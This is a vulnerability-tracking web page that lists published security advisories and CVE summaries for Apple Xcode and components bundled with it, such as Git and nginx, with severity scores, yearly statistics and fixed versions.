Apple Xcode
Don't miss out!
Thousands of developers use stack.watch to stay informed.Get an email whenever new security vulnerabilities are reported in Apple Xcode.
Recent Apple Xcode Security Advisories
Advisory | Title | Published |
---|---|---|
121239 | Xcode 16 - Apple Support Security Content | September 16, 2024 |
HT214092 | Xcode 15.3 Security Content | March 5, 2024 |
HT213939 | Xcode 15 Security Content | September 18, 2023 |
HT213883 | Xcode 14.0 Security Content | May 23, 2023 |
HT213679 | Xcode 14.3 Security Content | March 30, 2023 |
HT213496 | Xcode 14.1 Security Content | November 1, 2022 |
HT213261 | Xcode 13.4 Security Content | May 16, 2022 |
HT213189 | Xcode 13.3 Security Content | March 14, 2022 |
HT212818 | Xcode 13 Security Content | September 20, 2021 |
HT212320 | Xcode 12.5 Security Content | April 26, 2021 |
By the Year
In 2025 there have been 0 vulnerabilities in Apple Xcode. Last year, in 2024 Xcode had 6 security vulnerabilities published. Right now, Xcode is on track to have less security vulnerabilities in 2025 than it did last year.
Year | Vulnerabilities | Average Score |
---|---|---|
2025 | 0 | 0.00 |
2024 | 6 | 6.77 |
2023 | 7 | 6.71 |
2022 | 13 | 7.70 |
2021 | 2 | 7.75 |
2020 | 3 | 7.63 |
2019 | 10 | 8.40 |
2018 | 4 | 7.73 |
It may take a day or so for new Xcode vulnerabilities to show up in the stats or in the list of recent security vulnerabilties. Additionally vulnerabilities may be tagged under a different product or component name.
Recent Apple Xcode Security Vulnerabilities
This issue was addressed with improved permissions checking
CVE-2024-44228
7.5 - High
- October 28, 2024
This issue was addressed with improved permissions checking. This issue is fixed in Xcode 16. An app may be able to inherit Xcode permissions and access user data.
A privacy issue was addressed by removing sensitive data
CVE-2024-40862
5.3 - Medium
- September 17, 2024
A privacy issue was addressed by removing sensitive data. This issue is fixed in Xcode 16. An attacker may be able to determine the Apple ID of the owner of the computer.
This issue was addressed by enabling hardened runtime
CVE-2024-44162
7.8 - High
- September 17, 2024
This issue was addressed by enabling hardened runtime. This issue is fixed in Xcode 16. A malicious application may gain access to a user's Keychain items.
This issue was addressed through improved state management
CVE-2024-44191
5.5 - Medium
- September 17, 2024
This issue was addressed through improved state management. This issue is fixed in iOS 17.7 and iPadOS 17.7, Xcode 16, visionOS 2, watchOS 11, macOS Sequoia 15, iOS 18 and iPadOS 18, tvOS 18. An app may gain unauthorized access to Bluetooth.
Git is a revision control system
CVE-2024-32002
9 - Critical
- May 14, 2024
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
insecure temporary file
A logic issue was addressed with improved state management.
CVE-2024-23298
5.5 - Medium
- March 15, 2024
A logic issue was addressed with improved state management.
The issue was addressed with improved memory handling
CVE-2023-40391
5.5 - Medium
- September 27, 2023
The issue was addressed with improved memory handling. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, macOS Sonoma 14, Xcode 15. An app may be able to disclose kernel memory.
This issue was addressed by enabling hardened runtime
CVE-2023-40435
5.5 - Medium
- September 27, 2023
This issue was addressed by enabling hardened runtime. This issue is fixed in Xcode 15. An app may be able to access App Store credentials.
This issue was addressed with improved checks
CVE-2023-32396
7.8 - High
- September 27, 2023
This issue was addressed with improved checks. This issue is fixed in Xcode 15, tvOS 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to gain elevated privileges.
The issue was addressed with improved checks
CVE-2022-32920
5.5 - Medium
- September 06, 2023
The issue was addressed with improved checks. This issue is fixed in Xcode 14.0. Parsing a file may lead to disclosure of user information.
This issue was addressed with improved entitlements
CVE-2023-27945
6.3 - Medium
- May 08, 2023
This issue was addressed with improved entitlements. This issue is fixed in Xcode 14.3, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. A sandboxed app may be able to collect system logs.
The issue was addressed with improved memory handling
CVE-2023-27967
8.6 - High
- May 08, 2023
The issue was addressed with improved memory handling. This issue is fixed in Xcode 14.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.
An injection issue was addressed with improved input validation
CVE-2022-42797
7.8 - High
- February 27, 2023
An injection issue was addressed with improved input validation. This issue is fixed in Xcode 14.1. An app may be able to gain root privileges.
Injection
Git is an open source, scalable, distributed revision control system
CVE-2022-39260
8.8 - High
- October 19, 2022
Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git's push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.
Memory Corruption
Git is an open source, scalable, distributed revision control system
CVE-2022-39253
5.5 - Medium
- October 19, 2022
Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.
insecure temporary file
Git is a distributed revision control system
CVE-2022-29187
7.8 - High
- July 12, 2022
Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is vulnerable to privilege escalation in all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator in Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened from the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.
DLL preloading
This issue was addressed with improved checks
CVE-2022-26747
7.8 - High
- May 26, 2022
This issue was addressed with improved checks. This issue is fixed in Xcode 13.4. An app may be able to gain elevated privileges.
Git for Windows is a fork of Git containing Windows-specific patches
CVE-2022-24765
7.8 - High
- April 12, 2022
Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.
DLL preloading
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22604
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22601
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22602
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22603
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22605
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22607
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22608
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
An out-of-bounds read was addressed with improved bounds checking
CVE-2022-22606
7.8 - High
- March 18, 2022
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.
Out-of-bounds Read
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2
CVE-2021-44228
10 - Critical
- December 10, 2021
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Improper Input Validation
A path handling issue was addressed with improved validation
CVE-2021-1800
5.5 - Medium
- April 02, 2021
A path handling issue was addressed with improved validation. This issue is fixed in Xcode 12.4. A malicious application may be able to access arbitrary files on the host device while running an app that uses on-demand resources with Xcode.
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7
CVE-2020-9992
7.8 - High
- October 16, 2020
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case
CVE-2014-9390
9.8 - Critical
- February 12, 2020
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
Improper Input Validation
NGINX before 1.17.7, with certain error_page configurations
CVE-2019-20372
5.3 - Medium
- January 09, 2020
NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.
HTTP Request Smuggling
A memory corruption issue was addressed with improved validation
CVE-2019-8800
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8721
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8722
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8723
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4
CVE-2019-8724
8.8 - High
- December 18, 2019
Multiple issues in ld64 in the Xcode toolchains were addressed by updating to version ld64-507.4. This issue is fixed in Xcode 11.0. Compiling code without proper input validation could lead to arbitrary code execution with user privilege.
Improper Input Validation
A memory corruption issue was addressed with improved state management
CVE-2019-8738
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved state management. This issue is fixed in Xcode 11.0. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
A memory corruption issue was addressed with improved state management
CVE-2019-8739
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved state management. This issue is fixed in Xcode 11.0. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
A memory corruption issue was addressed with improved validation
CVE-2019-8806
7.8 - High
- December 18, 2019
A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution.
Buffer Overflow
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (
CVE-2019-14379
9.8 - Critical
- July 29, 2019
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution.
Prototype Pollution
A memory corruption issue was addressed with improved input validation
CVE-2018-4357
7.8 - High
- April 03, 2019
A memory corruption issue was addressed with improved input validation. This issue affected versions prior to Xcode 10.
Buffer Overflow
nginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might
CVE-2018-16845
6.1 - Medium
- November 07, 2018
nginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might allow an attacker to cause infinite loop in a worker process, cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted mp4 file. The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the .mp4. directive is used in the configuration file. Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.
Resource Exhaustion
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage
CVE-2018-16844
7.5 - High
- November 07, 2018
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
Resource Exhaustion
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption
CVE-2018-16843
7.5 - High
- November 07, 2018
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
Resource Exhaustion
An issue was discovered in certain Apple products
CVE-2018-4164
9.8 - Critical
- April 03, 2018
An issue was discovered in certain Apple products. Xcode before 9.3 is affected. The issue, which is unspecified, involves the "LLVM" component.
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
CVE-2017-7529
7.5 - High
- July 13, 2017
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
Integer Overflow or Wraparound
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 does not properly limit CNAME resolution, which
CVE-2016-0747
5.3 - Medium
- February 15, 2016
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 does not properly limit CNAME resolution, which allows remote attackers to cause a denial of service (worker process resource consumption) via vectors related to arbitrary name resolution.
Resource Exhaustion
Use-after-free vulnerability in the resolver in nginx 0.6.18 through 1.8.0 and 1.9.x before 1.9.10
CVE-2016-0746
9.8 - Critical
- February 15, 2016
Use-after-free vulnerability in the resolver in nginx 0.6.18 through 1.8.0 and 1.9.x before 1.9.10 allows remote attackers to cause a denial of service (worker process crash) or possibly have unspecified other impact via a crafted DNS response related to CNAME response processing.
Dangling pointer
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10
CVE-2016-0742
7.5 - High
- February 15, 2016
The resolver in nginx before 1.8.1 and 1.9.x before 1.9.10 allows remote attackers to cause a denial of service (invalid pointer dereference and worker process crash) via a crafted UDP DNS response.
NULL Pointer Dereference
The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider
CVE-2015-3185
- July 20, 2015
The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider that a Require directive may be associated with an authorization setting rather than an authentication setting, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging the presence of a module that relies on the 2.2 API behavior.
Permissions, Privileges, and Access Controls
Stay on top of Security Vulnerabilities
Want an email whenever new vulnerabilities are published for Canonical Ubuntu Linux or by Apple? Click the Watch button to subscribe.
